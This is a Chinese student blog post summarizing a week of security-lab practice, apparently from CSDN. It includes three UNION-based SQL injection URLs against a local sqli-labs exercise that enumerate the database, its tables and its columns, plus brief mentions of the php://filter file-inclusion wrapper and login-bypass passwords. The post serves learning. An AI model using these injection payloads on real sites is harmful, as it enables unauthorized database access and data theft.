本周学习总结

已于 2022-04-10 19:31:57 修改
阅读量1.9k 收藏
点赞数
文章标签: sql
于 2022-04-10 19:17:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhhhb1005/article/details/124083468
版权

目录

完成事项

一、每周需要写的题目

sql的两道题目

还有一个就是Secret File

二、SQL注入点判断及万能密码

三、未办事项

下周代做

完成事项

一、每周需要写的题目

        这一周的博客记录了4道题,其中有两道是sql注入,另外的是一道简单的php和一个信息泄露?(不确定是哪种类型的题目)同时还涉及到了文件包含的漏洞。

sql的两道题目

        第一道主要还是和万能密码有关,比较简单,第二题是sql注入,还是爆库,爆表,爆字段。有一段时间没去靶场练习sql了,所以写题时有点费脑子,不过按照以往的步骤还是写出来了。

爆库

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,database()–+

爆表

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’–+

爆字段

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=‘security’–+

还有一个就是Secret File

        前面还是看源代码,后面是burp抓包,最后就是php伪协议,这个php伪协议了解了一点,但不是特别了解,因为写题根本没想到,还是看别人的博客才知道的,这一题是用php://fileter伪协议来获取文件,所以php伪协议还需要了解。

        havefun有点简单就不说了。

二、SQL注入点判断及万能密码

        sql注入主要还是数字型和字符型,以及注入时or,and,xor等的运用进行注入。然后就是万能密码是根据过滤,运用逻辑运算符进行绕过但是csdn上讲的非常多,所以有点不明白这个是怎么判断数据库对什么进行了过滤。

三、未办事项

php的继续学习,最近课有点多,晚上来工作室的时间少,所以php进程较前两周很慢。

下周代做

  • 写题
  • 学习php,详细了解php伪协议
  • 文件上传,打upload靶场
  • 加固sql注入
S@Kura
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
前端vue本周个人学习成果
04-20
本周学习过程中,我深入研究了Vue.js这一前端框架,并积累了丰富的知识。Vue.js作为一款轻量级且功能强大的框架,被广泛应用于构建用户界面。以下是我从学习材料中提炼出的一些关键知识点: 1. **事件修饰符**...
极客大挑战2019(复习一下漏洞)
qq_62046696的博客
07-17 802
这种一般都是备份文件了,其实不太喜欢备份文件,扫目录太慢了,打开dirsearch进行扫目录了,其实是先尝试了一下index.php.bak发现没有,扫出来了www.zip。这道题难就难在,不按套路出牌,Flaaaag里面的f14gawsl字段,里面的值时NO,真正的flag在F1nal1y表里面的password字段。2、再尝试闭合方式,账号输入1,1’,1"判断,当输入为1’时报错,所以判断结果语句应该为单引号闭合(提示记得密码填上东西)...
SQL注入,很详细
m0_63683040的博客
04-20 1496
SQL注入(数字、UNION、字符型、布尔盲注、时间、报错、堆叠) SQL注入漏洞的方法 1.数字注入 在浏览器地址栏输入:learn.me/sql/article.php?id=1,这是一个get型接口,发送这个请求相当于调用一个查询语句: PHP源码: $sql = "SELECT * FROM database_name WHERE id =",$_GET[‘id’] 在浏览器地址栏输入:learn.me/sql/article.php?id=2-...
本周学习总结(数组)
m0_56664872的博客
04-21 233
主要对数组初步的相关算法题进行了学习,下周准备开始学习链表以及字符串的知识。2、学习了利用双指针解决重复数据、移动0的操作。1、复习了二分查找以及衍生的相关问题。3、学习了滑动窗口的思想。
初一本周学习总结.doc
02-19
初一本周学习总结.doc
初二本周学习总结.doc
02-19
初二本周学习总结.doc
本周工作总结(12月6号10号).doc
12-05
本周工作总结 以下是从给定的文件中生成的相关知识点: 文档管理 在我们日常的工作和学习中,文档管理是一个非常重要的环节。本周工作总结(12月6号10号).doc文件,就是一个典型的文档管理的例子。通过对文档的...
煤矿安全学习总结.docx
10-03
本周学习中,我们参与了外包单位的皮带接合实践,了解了如何正确操作和维护胶带输送机。根据胶带机的安全技术操作规程,操作工和维修工必须经过专门的培训并取得上岗证书。操作工需要熟悉设备性能、构造和原理,...
如何解决 PostgreSQL 中由于索引不当导致的性能下降问题?
技术笔记
07-12 473
比如说,有一个订单表,其中“订单日期”这个列经常被用于按时间范围查询订单,但却没有为其创建索引,这就会导致数据库在查询时需要遍历整个表,极大地降低了查询速度。命令,我们可以查看查询的执行计划。再举一个例子,如果我们发现某个表上存在多个类似的索引,比如“idx_age_1”和“idx_age_2”,并且它们的定义几乎相同,这时候就可以考虑删除其中一个冗余的索引,以减少维护成本和提高性能。然而,就像任何复杂的系统一样,它也可能会遇到性能方面的挑战,其中由于索引不当导致的性能下降问题是比较常见且令人头疼的。
SQL笔试题【数据岗】
房东的猫的博客
07-11 249
题目 4:输出一张 dws 表,查询过去任意日期的曝光活跃用户的 7 日留存率,输出字 段日 期,用户 id,7 日留存率具体表结构如下表 1 用户行为表:t_user_video_action_d l分区:ds(格式 yyyyMMdd) l主键:user_id、video_id l含义:一个用户对一个视频的所有行为聚合,每天增量 字段名字段含义类型。题目 3:计算每个用户每天第一次曝光视频的时间戳,运行速度越快越好,输出字段 日期, 用户 id,时间戳。
【postgresql】视图(View)
一个写了10年bug的程序员日常笔记。
07-10 554
PostgreSQL 中的视图(View)是一种虚拟表,其内容由 SQL 查询定义。视图可以简化复杂的 SQL 操作,使得用户能够以一种更直观、更易于理解的方式来访问和操作数据。PostgreSQL 视图是只读的,因此可能无法在视图上执行 DELETE、INSERT 或 UPDATE 语句。但是可以在视图上创建一个触发器,当尝试 DELETE、INSERT 或 UPDATE 视图时触发,需要做的动作在触发器内容中定义。
MySQL 进阶(三)【SQL 优化】
最新发布
梦想是动物管理员
07-13 841
MySQL SQL 优化
[高频 SQL 50 题(基础版)]第一千七百五十七题,可回收且低脂产品
weixin_45201305的博客
07-10 281
low_fats 是枚举类型,取值为以下两种 ('Y', 'N'),其中 'Y' 表示该产品是低脂产品,'N' 表示不是低脂产品。recyclable 是枚举类型,取值为以下两种 ('Y', 'N'),其中 'Y' 表示该产品可回收,而 'N' 表示不可回收。没什么难度,作为基础题五十题的第一题练手,现在也开始陆续写一些SQL,作为记录,和leetcode一起,大家都加油。编写解决方案找出既是低脂又是可回收的产品编号。是该表的主键(具有唯一值的列)。
SQL面试题-留存率计算
xiao4816的博客
07-07 357
计算的是整段时间范围内,每一天为基准的所有的留存1、2、7天的用户数。计算的是用户首次登陆时间为基准时间,计算该基准时间之后的n日留存率。方法一的优势是可以一次性计算出,每天的不同时间范围的留存率。缺点:如果要计算n天留存需要增加代码量。但是不是很直观,并且计算量比较大。优点:代码直观好理解。
SQL Server设置端口:跨平台指南
招风的黑耳CSDN
07-09 603
在使用SQL Server时,设置或修改其监听的端口是确保数据库服务安全访问和高效管理的重要步骤。由于SQL Server可以部署在多种操作系统上,包括Windows、Linux和Docker容器等,因此设置端口的步骤和方法也会因平台而异。本文将为您提供一个跨平台的指南,帮助您在不同环境下设置SQL Server的端口。
NoSQL之Redis配置与优化
henanchenxuyuan的博客
07-11 1219
Redis(RemoteDictionaryServer,远程字典型)是一个开源的、使用C语言编写的NoSQL数据库。Redis 基于内存运行并支持持久化,采用 key-value(键值对)的存储形式是目前分布式架构中不可或缺的一环。Redis服务器程序是单进程模型,也就是在一台服务器上可以同时启动多个Redis 进程,而 Redis 的实际处理速度则是完全依靠于主进程的执行效率。若在服务器上只运行一个Redis 进程,当多个客户端同时访问时,服务器的处理能力是会有一定程度的下降;
Python 获取 SQL 指纹和 HASH 值
分享既学习
07-10 393
本文介绍一个提取 SQL 指纹的方法,就是将 SQL 语句的条件转换为?可用于脱敏和 SQL 聚类分析的场景。
PostgreSQL 中如何实现数据的增量更新和全量更新的平衡?
技术笔记
07-09 952
在数据库管理中,数据的更新操作是常见的任务。对于大型数据集或高并发的系统,选择合适的更新策略至关重要。增量更新和全量更新是两种常见的数据更新方式,如何在 PostgreSQL 中平衡这两种更新方式以确保数据的一致性、性能和可靠性是一个值得深入探讨的问题。
weekly conclude.pptx
04-01
weekly conclude.pptx

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值